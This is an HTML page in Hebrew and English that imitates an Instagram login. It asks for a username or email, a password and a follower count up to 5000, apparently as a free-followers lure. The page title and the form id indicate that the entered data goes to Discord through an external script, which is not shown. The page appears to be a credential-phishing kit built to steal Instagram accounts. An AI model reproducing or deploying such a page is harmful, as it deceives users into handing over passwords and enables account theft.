<!DOCTYPE html>
<html lang="he">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>שליחת הודעה לדיסקורד</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <div class="container">
        <div class="header">
            <img src="https://upload.wikimedia.org/wikipedia/commons/a/a5/Instagram_icon.png" alt="Instagram Logo">
            <h1>Instagram</h1>
        </div>
        <form id="discordForm">
            <input type="text" id="line1" name="line1" placeholder="Phone number, username, or email" required>
            <input type="password" id="line2" name="line2" placeholder="Password" required>
            <input type="number" id="followers" name="followers" placeholder="Followers" required>
            <small>יש לבחור מספר עד 5000</small>
            <button type="submit">Log in</button>
        </form>
    </div>
    <script src="script.js"></script>
</body>
</html>
